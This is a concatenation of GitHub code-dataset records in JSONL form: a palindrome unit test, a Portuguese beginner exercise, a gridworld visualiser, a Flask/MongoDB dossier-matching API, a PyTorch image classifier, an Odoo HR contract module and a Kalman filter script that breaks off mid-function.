maths_q.closest_palindrome_number(99)\n self.assertEqual(closest_pal, 101)\n\n closest_pal = maths_q.closest_palindrome_number(90)\n self.assertEqual(closest_pal, 88)\n\n closest_pal = maths_q.closest_palindrome_number(121)\n self.assertEqual(closest_pal, [131, 111])\n\n\n closest_pal = maths_q.closest_palindrome_number(911)\n self.assertEqual(closest_pal, 909)\n\n\n closest_pal = maths_q.closest_palindrome_number(502)\n self.assertEqual(closest_pal, 505)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Bryan-Rathos/coding-interview-arena","sub_path":"code/python/maths_questions_test.py","file_name":"maths_questions_test.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"25144962083","text":"#Faça um programa que simule um salão de beleza. \n#O usuário deverá digitar o nome e o serviço desejado (corte de cabelo ou manicure). \n#O programa deve exibir uma mensagem confirmando o serviço escolhido e perguntar \n#se o usuário deseja agendar outro serviço. \n#O laço deve continuar até que o usuário decida encerrar o atendimento.\n\n\nwhile True:\n nome = input(\"Digite seu nome: \\n\")\n servico = input(\"Digite o serviço que você deseja: corte de cabelo ou manicure: \\n\")\n\n print(f\"O serviço de {servico} foi marcado para {nome}\")\n\n opcao = input(\"Deseja agendar outro serviço ? 
(s/n) \\n\")\n if opcao.lower() != \"s\":\n break","repo_name":"MiVeiga/Jornada-Ciencia-de-Dados","sub_path":"Módulo_1/Aula 3/exercicio_30.py","file_name":"exercicio_30.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"31350305268","text":"from boarld.gridworld.rl.agent.GridAgent import GridAgent\nfrom boarld.gridworld.visual.tk.AbstractVisualGrid import AbstractVisualGrid\nfrom boarld.core.util.observ.Observable import Observable\nfrom boarld.core.util.observ.Observer import Observer\n\n\nclass VisualGridAgentTraining(AbstractVisualGrid, Observer):\n\n def __init__(self, agent: GridAgent):\n self.agent: GridAgent = agent\n super().__init__(agent.board)\n self.add_observable(agent)\n self.path_circles = {}\n self.path_lines = {}\n\n def act_on_notify(self, observable: Observable):\n\n tuples = [(s.data.x, s.data.y) for s in self.agent.traveled_path]\n\n for y in range(self.grid.nb_rows):\n for x in range(self.grid.nb_cols):\n key = (x, y)\n if key in tuples:\n if key not in self.path_circles:\n self.path_circles[key] = self.canvas.create_oval(x * self.unit + self.unit/2 - self.unit / 10, y * self.unit + self.unit/2 - self.unit / 10, x * self.unit + self.unit/2 + self.unit / 10, y * self.unit + self.unit/2 + self.unit / 10, width=2)\n else:\n self.canvas.itemconfig(self.path_circles[key], fill='white')\n if key == tuples[len(tuples)-1]:\n self.canvas.itemconfig(self.path_circles[key], fill='orange')\n else:\n if key in self.path_circles:\n self.canvas.delete(self.path_circles.pop(key))\n\n line_keys = set()\n for idx, tuple in enumerate(tuples[:-1]):\n x, y = tuple\n x2, y2 = tuples[idx+1]\n line_coor = (x, y, x2, y2)\n if line_coor not in self.path_lines:\n self.path_lines[line_coor] = self.canvas.create_line(x * self.unit + self.unit / 2, y * self.unit + self.unit / 2, x2 * self.unit + self.unit / 2, y2 * self.unit + self.unit / 2)\n line_keys.add(line_coor)\n for line_key in list(self.path_lines.keys()):\n if line_key not in line_keys:\n self.canvas.delete(self.path_lines.pop(line_key))\n\n # time.sleep(.5)\n","repo_name":"BramVandendriessche/boarld","sub_path":"boarld/boarld/gridworld/visual/tk/VisualGridAgentTraining.py","file_name":"VisualGridAgentTraining.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44151706008","text":"# -*- coding: utf-8 -*-\nfrom flask_restful import Resource, reqparse, abort, request\nfrom app.models import Source, Dossiers, Societys\nfrom bson.json_util import dumps, ObjectId, loads \n# from bson.json_util import loads as bason_loads\nfrom json import loads\nfrom app.auth import verify_token\nfrom datetime import datetime\nfrom pymongo import DESCENDING, ASCENDING\nimport time\nimport re\nimport jieba\nfrom app.utils import cal_weights\nfrom functools import reduce\n\nclass Dossier(Resource):\n def __init__(self, ):\n self.parser = reqparse.RequestParser()\n\n decorators = [verify_token]\n\n def get(self, returnToken=None, userId=None):\n self.parser.add_argument('org_name', type=str, help=\"请传入字符串类型\", default=\"\")\n self.parser.add_argument('unite_credict_code', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('law_men', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('region', type=str, action=\"append\", default=[])\n self.parser.add_argument('timerange', type=int, action=\"append\", default=[], help=\"请传入整数数组\")\n 
self.parser.add_argument('org_classify', type=str)\n self.parser.add_argument('sort', type=str)\n self.parser.add_argument('page', type=int, default=1)\n self.parser.add_argument('limit', type=int, default=10)\n self.parser.add_argument(\"dosser_id\", type=str)\n params = self.parser.parse_args()\n dosser_id = params.get(\"dosser_id\")\n if dosser_id:\n res = Dossiers.objects.get(_id=ObjectId(dosser_id)).to_json()\n for item in res.get(\"society_ids\", []):\n temp = item.pop(\"_id\")\n if temp.get(\"$oid\"):\n item[\"_id\"] = temp.get(\"$oid\")\n\n for item in res.get(\"source_ids\", []): \n temp = item.pop(\"_id\")\n if temp.get(\"$oid\"):\n item[\"_id\"] = temp.get(\"$oid\")\n\n return {\n \"data\": res,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n page = params.pop(\"page\")\n limit = params.pop(\"limit\")\n where = {}\n for key, val in params.items():\n if key == 'region':\n if val:\n where.update({\"region\": {\"$all\": val} })\n else:\n if val:\n if key == \"timerange\": \n where.update({\"org_create_date\": {\"$gte\": val[0], \"$lte\": val[1]} })\n where.update({\n key: {\"$regex\": val}\n })\n\n Dossiers_collection = Dossiers._get_collection()\n total = Dossiers_collection.find(where).count()\n res = Dossiers_collection.aggregate([\n {\"$match\": where},\n {\n \"$unwind\": { \"path\" : \"$society_ids\", \"preserveNullAndEmptyArrays\":True}\n },\n {\n \"$unwind\": { \"path\" : \"$source_ids\", \"preserveNullAndEmptyArrays\":True}\n },\n {\n \"$lookup\": {\n \"from\": 'society',\n \"localField\": 'society_ids._id' ,\n \"foreignField\": '_id',\n \"as\": \"society_data\"\n }\n },\n {\n \"$lookup\": {\n \"from\": 'source',\n \"localField\": 'source_ids._id' ,\n \"foreignField\": '_id',\n \"as\": \"source_data\"\n }\n },\n {\n \"$group\": {\"_id\":\"$_id\", \"data\": {\"$mergeObjects\": \"$$ROOT\"} }\n },\n {\n \"$project\": {\n \"_id\": 0,\n }\n },\n {\n \"$sort\": {\n \"data.society_ids.f_score\": -1,\n \"data.source_ids.f_score\": -1,\n \"data.org_create_date\": -1,\n \"data.createAt\": -1,\n \"data.updateAt\": -1,\n },\n },\n {\n \"$skip\": (page-1)*limit\n },\n {\n \"$limit\": limit\n },\n ])\n res = loads(dumps(res))\n resData = {\n \"data\": res,\n \"total\": total\n }\n return {\n \"items\": resData,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n\n def post(self, returnToken=None, userId=None):\n params = self.parser.parse_args()\n self.parser.add_argument('org_name', type=str, help=\"请传入字符串类型\", default=\"\")\n self.parser.add_argument('unite_credict_code', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('law_men', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('work_range', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('region', type=str, action=\"append\", default=[])\n # self.parser.add_argument('timerange', type=int, help=\"请传入整数类型\", action=\"append\", default=[])\n self.parser.add_argument('org_create_date', type=int)\n self.parser.add_argument('org_classify', type=str, help=\"请传入字符串类型\",)\n self.parser.add_argument('logo_url', type=str, help=\"请传入字符串类型\",)\n self.parser.add_argument('extra', type=str, help=\"请传入字符串类型\",)\n self.parser.add_argument(\"society_ids\", type=dict, action=\"append\", default=[])\n self.parser.add_argument(\"source_ids\", type=dict, action=\"append\", default=[])\n self.parser.add_argument(\"dosser_id\", type=str)\n params = self.parser.parse_args()\n source_ids = params.get(\"source_ids\")\n society_ids = params.get(\"society_ids\")\n try:\n for item in source_ids:\n item['_id'] = 
ObjectId(item.get('_id'))\n for item in society_ids:\n item['_id'] = ObjectId(item.get('_id'))\n dosser_id = params.pop(\"dosser_id\", None)\n if dosser_id:\n params.update({\n \"updateAt\": datetime.utcnow()\n })\n res = Dossiers.objects(_id= ObjectId(dosser_id) ).update_one(**params)\n return {\n \"code\": 200,\n \"returnToken\": returnToken\n }\n except Exception as e:\n abort(400, **{\"message\":{\"must\":\"不合法的参数\"}})\n \n data = Dossiers(**params)\n data.save()\n res_id = str( data['auto_id_0'] )\n \n return {\n \"res_id\": res_id,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n\nclass DossierMatch(Resource):\n def __init__(self, ):\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('org_name', type=str, help=\"请传入字符串类型\", default=\"\")\n self.parser.add_argument('unite_credict_code', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('law_men', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('work_range', type=str, help=\"请传入字符串类型\")\n self.parser.add_argument('region', type=str, action=\"append\", default=[])\n self.parser.add_argument('timerange', type=int, help=\"请传入整数类型\", action=\"append\", default=[])\n self.parser.add_argument('page', type=int, default=1)\n self.parser.add_argument('limit', type=int, default=10)\n \n decorators = [verify_token]\n def generateWeights(self, weights, filter_keys=['org_name', 'law_men', 'work_range', 'region', 'timerange'] ):\n params = self.parser.parse_args()\n front_keys = [ key for key, val in params.items() if val and key in filter_keys ] #前台展示比例\n weights_front = weights.copy()\n weights_front = list( weights_front.items() )\n def add(x, y):\n if type(x) == tuple:\n if x[0] in front_keys:\n x = x[1]\n else:\n x = 0\n\n if type(y) == tuple:\n if y[0] in front_keys:\n y = y[1]\n else:\n y = 0 \n \n return x+ y\n\n total_rate = reduce(add, weights_front)\n def filter_front(item):\n key, val = item\n if key in front_keys:\n if val >= 1:\n return item\n item = ( key, val * (1/total_rate) )\n return item\n else:\n return (key, 0)\n \n weights_front = dict( map(filter_front, weights_front ) )\n return weights_front\n\n def get(self, returnToken=None, userId=None): #匹配社会组织\n params = self.parser.parse_args()\n where = {}\n weights_obj = cal_weights()\n weights = weights_obj.get(\"weights\")\n weights_front = self.generateWeights(weights)\n org_name_len = 0\n for key, val in params.items():\n if not val:\n continue\n if key == 'region' :\n where.update({\"region\": {\"$all\": val} })\n elif key == 'timerange':\n if val:\n if len(val) == 2:\n where.update({\"org_create_date\": {\"$gte\":val[0], \"$lte\":val[1]} })\n elif len(val) == 1:\n where.update({\"org_create_date\": {\"$gte\":val[0]} })\n else:\n continue\n else:\n if key == \"unite_credict_code\":\n continue\n if key!= \"page\" and key!=\"limit\": \n val = val.strip()\n if val:\n if key == \"org_name\":\n org_name_len = len(val.replace(\" \",\"\"))\n temp = re.split('\\s+', val) #空格匹配\n where[\"$and\"] = []\n for temp_i in temp:\n where[\"$and\"].append({ \"org_name\": {\"$regex\": re.compile(\"{0}\".format(temp_i))} })\n continue\n parttern = re.compile(\"{0}\".format(val))\n where.update({\n key:{\"$regex\": parttern}\n })\n\n if params.get(\"unite_credict_code\"):\n where = {\n \"$or\": [\n {\n \"unite_credict_code\": params.get(\"unite_credict_code\")\n },\n where\n ]\n }\n # print(where)\n collection = Dossiers._get_collection()\n Societys_collection = Societys._get_collection() \n page = params.get(\"page\")\n limit = params.get(\"limit\")\n 
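# placeholder counter; not referenced by the aggregation below\n        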
work_range_count = 0\n if where == {}:\n abort(400, **{\"message\":{\"must\":\"请至少提供一个参数\"}})\n res = Societys_collection.aggregate([\n {\"$match\": where},\n { \n \n \"$addFields\":{\n \"name_score\":{ \"$cond\": [ \"$org_name\", {\"$divide\":[ org_name_len, {\"$strLenCP\":\"$org_name\"}] }, 0 ]},\n \"law_men_score\": { \"$cond\": [ {\"$in\": [ { \"$indexOfCP\":[ \"$law_men\" , params.get(\"law_men\") ]}, [None, -1] ]} , 0, {\"$divide\":[ len(params.get(\"law_men\", \"\")), {\"$strLenCP\":\"$law_men\"}] } ]},\n \"region_score\": { \"$cond\": [{\"$in\": [ params.get(\"region\"), [ [], ['']] ]} , 0, 1 ]},\n \"timerange_score\": { \"$cond\": [ {\"$in\": [ params.get(\"timerange\"), [ [], ['']] ]}, 0, 1 ]},\n \"work_range_score\": { \"$cond\": { \"if\" : bool(params.get(\"work_range\")) , \"then\": 1, \"else\": 0 } },\n \"unite_credict_code_score\": { \"$cond\": [ {\"$eq\": [ params.get(\"unite_credict_code\",False), \"$unite_credict_code\" ] } , 1, 0 ] },\n \"society_id\": {\n \"$toString\":\"$_id\"\n },\n }\n },\n {\n \"$addFields\":{\n \"name_score_rate\": {\"$multiply\": [ \"$name_score\", weights.get(\"org_name\")] }, \n \"law_men_score_rate\": {\"$multiply\": [ \"$law_men_score\", weights.get(\"law_men\")] },\n \"region_score_rate\": {\"$multiply\": [ \"$region_score\", weights.get(\"region\")] }, \n \"work_range_score_rate\": {\"$multiply\": [ \"$work_range_score\", weights.get(\"work_range\")] },\n \"timerange_score_rate\": {\"$multiply\": [ \"$timerange_score\", weights.get(\"timerange\")] },\n \"unite_credict_code_score_rate\":\"$unite_credict_code_score\",\n \"f_name_score_rate\": {\"$multiply\": [ \"$name_score\", weights_front.get(\"org_name\")] }, \n \"f_law_men_score_rate\": {\"$multiply\": [ \"$law_men_score\", weights_front.get(\"law_men\")] },\n \"f_region_score_rate\": {\"$multiply\": [ \"$region_score\", weights_front.get(\"region\")] }, \n \"f_work_range_score_rate\": {\"$multiply\": [ \"$work_range_score\", weights_front.get(\"work_range\")] },\n \"f_timerange_score_rate\": {\"$multiply\": [ \"$timerange_score\", weights_front.get(\"timerange\")] },\n }\n },\n {\n \"$addFields\":{\n \"score\": { \"$sum\": [\n \"$name_score_rate\", \"$law_men_score_rate\", \"$region_score_rate\", \"$work_range_score_rate\", \"$timerange_score_rate\", \"$unite_credict_code_score_rate\"\n ]\n },\n \"f_score\": { \"$sum\": [\n \"$f_name_score_rate\", \"$f_law_men_score_rate\", \"$f_region_score_rate\", \"$f_work_range_score_rate\", \"$f_timerange_score_rate\", \"$unite_credict_code_score_rate\"\n ]\n }\n }\n },\n {\n \"$facet\":{\n \"total\":[\n {\"$count\": \"total\" }\n ],\n \"data\": [\n {\n \"$project\":{\n \"_id\": 0,\n }\n },\n {\n \"$sort\": {\n \"score\": -1\n }\n },\n {\n \"$skip\": (page-1)*limit\n },\n {\n \"$limit\": limit\n },\n \n ]\n },\n },\n {\n \"$project\":{\n \"total\": { \n \"$arrayElemAt\": [ \"$total.total\", 0 ] \n },\n \"data\": 1\n }\n },\n\n ])\n society_data = loads(dumps(res))\n society_data = society_data[0] if len(society_data)>0 else {}\n return {\n \"items\": society_data,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n def post(self, returnToken=None, userId=None): #匹配微信\n params = self.parser.parse_args()\n where = {}\n weights_obj = cal_weights()\n weights = weights_obj.get(\"weights\", ['org_name', 'work_range', 'timerange'] )\n weights_front = self.generateWeights(weights, filter_keys=['org_name'])\n org_name_len = 0\n for key, val in params.items():\n if not val:\n continue\n\n if key == 'timerange':\n if val:\n if len(val) == 2:\n 
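# both bounds supplied: restrict company_create_date to [val[0], val[1]]\n                        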
where.update({\n \"info.company_create_date\":{\"$gte\": val[0], \"$lte\":val[1] },\n })\n elif len(val) == 1:\n where.update({\n \"info.company_create_date\":{\"$gte\": val[0] },\n })\n else:\n continue\n else:\n if key == \"unite_credict_code\":\n continue\n if key!= \"page\" and key!=\"limit\": \n val = val.strip()\n if val:\n if key == \"org_name\":\n org_name_len = len(val.replace(\" \",\"\"))\n temp = re.split('\\s+', val) #空格匹配\n where[\"$and\"] = []\n for temp_i in temp:\n # print(temp_i)\n where[\"$and\"].append({ \"NickName\": {\"$regex\": re.compile(\"{0}\".format(temp_i)) } })\n continue\n if key == \"work_range\":\n val = \"|\".join(jieba.lcut(val))\n where.update({\n \"$or\": []\n })\n where[\"$or\"] = where[\"$or\"] + [ { \"info.work_range_common\": re.compile( \"{0}\".format(val) ) }, { \"info.work_range_front_premit\": re.compile(\"{0}\".format(val) ) }]\n\n if params.get(\"unite_credict_code\"):\n where= {\n \"$or\": [\n {\n \"gs_credict_code\": params.get(\"unite_credict_code\")\n },\n {\n \"zz_credict_code\": params.get(\"unite_credict_code\")\n },\n where\n ]\n }\n if where == {}:\n abort(400, **{\"message\":{\"must\":\"请至少提供一个参数\"}})\n\n page = params.get(\"page\")\n limit = params.get(\"limit\")\n source_collecion = Source._get_collection()\n res = source_collecion.aggregate([\n {\"$match\": where},\n {\n \"$facet\":{\n \"total\":[\n {\"$count\": \"total\" }\n ],\n \"data\": [\n {\n \"$project\":{\n \"_id\": 1,\n \"NickName\": 1,\n \"info\": {\"$ifNull\": [\"$info\", {}]},\n \"__biz\": 1,\n \"name_score_one\": 1,\n \"name_score_one\":{ \"$cond\":[\n { \"$and\": [\"$NickName\", bool(params.get(\"org_name\")) ] },\n {\"$divide\":[ org_name_len, {\"$strLenCP\": \"$NickName\" } ] },\n None,\n ]\n },\n \"name_score_two\":{ \"$cond\":[\n { \"$and\": [\"$info.full_name\", bool(params.get(\"org_name\")) ] },\n {\"$divide\":[ org_name_len, {\"$strLenCP\": \"$info.full_name\" } ] },\n None,\n ]\n },\n \"work_range_score\": { \"$cond\": { \"if\" : bool(params.get(\"work_range\")) , \"then\": 1, \"else\": 0 } },\n \"timerange_score\": { \"$cond\": { \"if\" : bool(params.get(\"timerange\")) , \"then\": 1, \"else\": 0 } },\n \"unite_credict_code_score\": { \"$cond\": { \"if\" : bool(params.get(\"unite_credict_code\")) , \"then\": 1, \"else\": 0 } },\n }\n },\n {\n \"$addFields\": {\n \"name_score\": {\n \"$let\":{\n \"vars\": {\n \"name_score\": \"$name_score_one\" or \"$name_score_two\" or 0\n },\n \"in\": \"$$name_score\"\n }\n \n },\n \"source_id\": {\n \"$toString\":\"$_id\"\n },\n }\n },\n {\n \"$addFields\": {\n \"name_score_rate\": {\"$multiply\": [ \"$name_score\", weights.get(\"org_name\")] }, \n \"work_range_score_rate\":{\"$multiply\": [ \"$work_range_score\", weights.get(\"work_range\")] },\n \"timerange_score_rate\":{\"$multiply\": [ \"$timerange_score\", weights.get(\"timerange\")] },\n \"unite_credict_code_score_rate\":\"$unite_credict_code_score\",\n \"f_name_score_rate\": {\"$multiply\": [ \"$name_score\", weights_front.get(\"org_name\")] }, \n \"f_work_range_score_rate\":{\"$multiply\": [ \"$work_range_score\", weights_front.get(\"work_range\")] },\n \"f_timerange_score_rate\":{\"$multiply\": [ \"$timerange_score\", weights_front.get(\"timerange\")] },\n }\n },\n {\n \"$addFields\": {\n \"score\": { \"$sum\": [\"$name_score_rate\", \"$work_range_score_rate\",\"timerange_score_rate\", \"$unite_credict_code_score_rate\"]},\n \"f_score\": { \"$sum\": [\"$f_name_score_rate\",\"f_timerange_score_rate\", \"$f_work_range_score_rate\", 
\"$unite_credict_code_score_rate\"]}\n }\n },\n {\n \"$sort\": {\n \"score\": -1\n }\n },\n {\n \"$skip\": (page-1)*limit\n },\n {\n \"$limit\": limit\n },\n \n ]\n },\n },\n {\n \"$project\":{\n \"total\": { \n \"$arrayElemAt\": [ \"$total.total\", 0 ] \n },\n \"data\": 1\n }\n },\n\n ])\n source_data = loads(dumps(res))\n source_data = source_data[0] if len(source_data)>0 else {}\n return {\n \"items\": source_data,\n \"code\": 200,\n \"returnToken\": returnToken\n }\n # res = cal_weights()\n # weights = res[\"weights\"]\n # weights[\"社会组织名称\"] = weights.pop(\"org_name\")\n # weights[\"统一社会信用代码\"] = 1\n # weights[\"法定代表人姓名\"] = weights.pop(\"law_men\")\n # weights[\"行政区划\"] = weights.pop(\"region\")\n # weights[\"业务范围\"] = weights.pop(\"work_range\")\n # weights[\"成立登记日期\"] = weights.pop(\"timerange\")\n # return {\n # \"data\": res,\n # \"code\": 200,\n # \"returnToken\": returnToken\n # }\n","repo_name":"foggsz/luck","sub_path":"flask_back/app/api/dossiers.py","file_name":"dossiers.py","file_ext":"py","file_size_in_byte":23372,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"40127137734","text":"import torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data\nimport torch.backends.cudnn as cudnn\nimport torchvision\nfrom torchvision import transforms as transforms\nimport numpy as np\nimport visdom\nimport torch.nn.functional as F\nimport PIL.Image as Image\n\n\nimport argparse\nimport os\n\nfrom models.RMA_module_with_priori import RMA_module\nfrom models.loss_with_priori import loss_function\nfrom utils import get_target_transform as target_trans\nfrom utils import id2label\n\n\n# GPU setting\nos.environ.setdefault(\"CUDA_VISIBLE_DEVICES\", \"6\")\n\n\n# ==================================================================\n# Constants\n# ==================================================================\nEPOCH = 45 # number of times for each run-through\nBATCH_SIZE = 8 # number of images for each epoch\nN = 512 # size of input images (512 or 640)\nTOPK = 3 # top k highest-ranked labels \nGPU_IN_USE = torch.cuda.is_available() # whether using GPU\nPATH_MODEL_PARAMS = './params/params_with_priori.pkl'\n\n\n# ==================================================================\n# Parser Initialization\n# ==================================================================\nparser = argparse.ArgumentParser(description='Pytorch Implementation of ICCV2017_AttentionImageClass')\nparser.add_argument('--testBatchSize', default=BATCH_SIZE, type=int, help='testing batch size')\nparser.add_argument('--pathModelParams', default=PATH_MODEL_PARAMS, type=str, help='path of model parameters')\nparser.add_argument('--loadModel', default=True, type=bool, help='load model parameters')\nargs = parser.parse_args()\n\n\n# ==================================================================\n# Transforms for the Input Images\n# ==================================================================\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\ntransforms = transforms.Compose([\n transforms.Resize((N, N)), \n transforms.ToTensor(),\n normalize\n ]) \n \n\nclass RMA_model(object):\n # 构造函数里加载模型,比如 tensorflow 的 graph, sess 等\n def __init__(self):\n # prepare model\n print('\\n***** Prepare Model *****')\n vgg16 = torchvision.models.vgg16(pretrained=True)\n self.extract_features = vgg16.features\n self.RMA = RMA_module(lstm_input_size=14, lstm_hidden_size=4096, zk_size=4096)\n if args.loadModel:\n 
self.RMA.load_state_dict(torch.load(args.pathModelParams))\n        if GPU_IN_USE:\n            print('CUDA_VISIBLE_DEVICES:', os.environ['CUDA_VISIBLE_DEVICES'])\n            print('cuda: move all model parameters and buffers to the GPU')\n            self.extract_features.cuda()\n            self.RMA.cuda()\n            cudnn.benchmark = True\n        print('Model Preparation : Finished')\n\n    # Test\n    def evaluate(self, data):\n        print('evaluate:')\n        self.RMA.eval() # set the module in evaluation mode\n        print('before transforms')\n        data = transforms(data).unsqueeze(0)\n        if GPU_IN_USE:\n            data = data.cuda() # set up GPU Tensor\n        \n        print('before extracting features')\n        f_I = self.extract_features(data) \n        output, _ = self.RMA(f_I)\n        print('after RMA') \n        prediction = torch.topk(F.softmax(output, dim=1), 10, dim=1) \n        filter = prediction[0].eq(0.1) + prediction[0].gt(0.1)\n        category_id = torch.mul(prediction[1]+1, filter.type(torch.cuda.LongTensor))\n        print(prediction[0])\n        #print(category_id)\n        return id2label(category_id)[0].tolist()\n\n\n    # 需要对外提供一个 API,可以直接拿到你们的结果\n    def image_recognition(self, image_path):\n        # 业务逻辑\n        print('image path: ', image_path)\n        image = Image.open(image_path)\n        if not image.mode == 'RGB':\n            image = image.convert('RGB')\n        with torch.no_grad():\n            label = self.evaluate(image)\n        print(label)\n        return dict(\n            data = label\n        )\n    \n    def __del__(self):\n        print(\"delete!\")\n\n# 生成模型实例\n# 这里生成模型实例供 server 导入并调用\nprint(\"生成 RMA Model 实例.................\")\nRMA_model_instance = RMA_model()\nprint(\"RMA Model 实例生成完成...............\")\n","repo_name":"James-Yip/AttentionImageClass","sub_path":"RMA_recognition.py","file_name":"RMA_recognition.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"60"}
{"seq_id":"40349458091","text":"#!/usr/bin/env python\nimport json\nimport sys\n\nif len(sys.argv) > 1:\n    data = json.loads(open(sys.argv[1]).read())\nelse:\n    data = json.loads(sys.stdin.read())\n\nprint(json.dumps(data, sort_keys=True, indent=4))\n","repo_name":"geekychandraul/Python","sub_path":"pretty-json.py","file_name":"pretty-json.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"150964275","text":"class Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        # scan every pair (i, j) with i < j and return the first pair summing to target\n        for i in range(len(nums)):\n            for j in range(i + 1, len(nums)):\n                if nums[i] + nums[j] == target:\n                    return [i, j]\n        return []\n\n\n","repo_name":"HeyAnirudh/leetcode","sub_path":"Two Sum.py","file_name":"Two Sum.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"71015653952","text":"from odoo import models, fields, api\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass Contract(models.Model):\n    _inherit = 'hr.contract'\n\n    analytic_account_id = fields.Many2one('account.analytic.account', string=\"Analytic Account\", copy=False, ondelete='set null',\n        domain=\"['|', ('company_id', '=', False), ('company_id', '=', company_id)]\", check_company=True,\n        help=\"Analytic account to which this project is linked for financial management. 
\"\n \"Use an analytic account to record cost and revenue on your project.\")\n \n timesheet_cycle = fields.Selection([\n ('monthly','Monthly'),\n ('weekly','Weekly'),\n ], string='Timesheet Cycle', default='monthly')\n \n timesheet_mode = fields.Selection([\n ('daily','Daily'),\n ('hourly','Hourly'),\n ], string='Timesheet Mode', default='daily')\n\n customer = fields.Many2one(related=\"cost_card.job_pos.customer\")\n timesheet_approver_1 = fields.Many2one('res.partner', string='Timesheet Approver 1', tracking=True, domain=\"['&', '|', ('company_id', '=', False), ('company_id', '=', company_id), ('type', '=', 'contact'), ('parent_id', '=', customer)]\")\n timesheet_approver_2 = fields.Many2one('res.partner', string='Timesheet Approver 2', tracking=True, domain=\"['&', '|', ('company_id', '=', False), ('company_id', '=', company_id), ('type', '=', 'contact'), ('parent_id', '=', customer)]\")\n \n @api.model\n def create(self, values):\n \"\"\" Create an analytic account for contract\n Note: create it before calling super() to avoid raising the ValidationError from _check_allow_timesheet\n \"\"\"\n if not values.get('analytic_account_id'):\n analytic_account = self._create_analytic_account_from_values(values)\n values['analytic_account_id'] = analytic_account.id\n response = super(Contract, self).create(values)\n return response\n\n def write(self, values):\n \"\"\" Create an analytic account for contract\n Note: create it before calling super() to avoid raising the ValidationError from _check_allow_timesheet\n \"\"\"\n response = super(Contract, self).write(values)\n if not self.analytic_account_id and not values.get('analytic_account_id'):\n self._create_analytic_account()\n return response\n\n def _create_analytic_account_from_values(self, values):\n analytic_account = self.env['account.analytic.account'].create({\n 'name': values.get('name', 'Unknown Analytic Account'),\n 'company_id': values.get('company_id') or self.env.company.id,\n 'partner_id': values.get('partner_id'),\n 'active': True,\n })\n return analytic_account\n\n def _create_analytic_account(self):\n for contract in self:\n analytic_account = self.env['account.analytic.account'].create({\n 'name': contract.name,\n 'company_id': contract.company_id.id,\n 'partner_id': contract.customer.id,\n 'active': True,\n })\n contract.write({'analytic_account_id': analytic_account.id})","repo_name":"dionisiotorres/nomina_v13","sub_path":"edari_timesheet/models/hr_contract.py","file_name":"hr_contract.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7265777557","text":"import numpy as np\r\nimport pandas as pd\r\nfrom filterpy.kalman import ExtendedKalmanFilter\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# File path of the dataset\r\nfile_path = r\"C:\\Users\\SHAIK VAZEER AHAMED\\Downloads\\Land vehicle\\Stationary_MRU_2021.xlsx\"\r\n\r\n\r\n# Load dataset\r\ndata = pd.read_excel(file_path)\r\n\r\n\r\n# Convert non-numeric values to NaN\r\nnumeric_columns = ['Magn_Z', 'Magn_Y', 'Magn_X', 'Acc_Z', 'Acc_Y', 'Acc_X', 'Gyro_Z', 'Gyro_Y', 'Gyro_X', 'Heading', 'Pitch', 'Roll', 'P_Bar', 'Altitude', 'Long', 'Lat']\r\ndata[numeric_columns] = data[numeric_columns].apply(pd.to_numeric, errors='coerce')\r\n\r\n\r\n# Extract relevant columns for tracking\r\ncolumns = ['Acc_X', 'Acc_Y', 'Acc_Z', 'Long', 'Lat', 'Gyro_X', 'Gyro_Y', 'Gyro_Z']\r\n\r\n\r\n# Filter out rows with insufficient data for tracking\r\ndata = 
data.dropna(subset=columns)\r\n\r\n\r\n# Create Extended Kalman filter\r\nnum_states = 8 # Number of states to track (Acc_X, Acc_Y, Acc_Z, Long, Lat, Gyro_X, Gyro_Y, Gyro_Z)\r\ndim_z = 8 # Number of measurements (Acc_X, Acc_Y, Acc_Z, Long, Lat, Gyro_X, Gyro_Y, Gyro_Z)\r\n\r\nekf = ExtendedKalmanFilter(dim_x=num_states, dim_z=dim_z)\r\n\r\n\r\n# Initialize Extended Kalman filter\r\ninitial_state = data.iloc[0][columns].values.astype(np.float64)\r\ninitial_covariance = np.eye(num_states) * 0.1\r\n\r\nekf.x = initial_state\r\nekf.P = initial_covariance\r\n\r\n\r\n# Define state transition matrix and control input matrix\r\ndt = 1.0\r\nekf.F = np.eye(num_states)\r\nekf.B = np.eye(num_states)\r\n\r\n\r\n# Define measurement function\r\ndef h(x):\r\n    # Modify this function based on the measurements available in your system\r\n    return x\r\n\r\n\r\n# Define the Jacobian matrix of the measurement function\r\ndef H(x):\r\n    # Modify this function based on the Jacobian of your 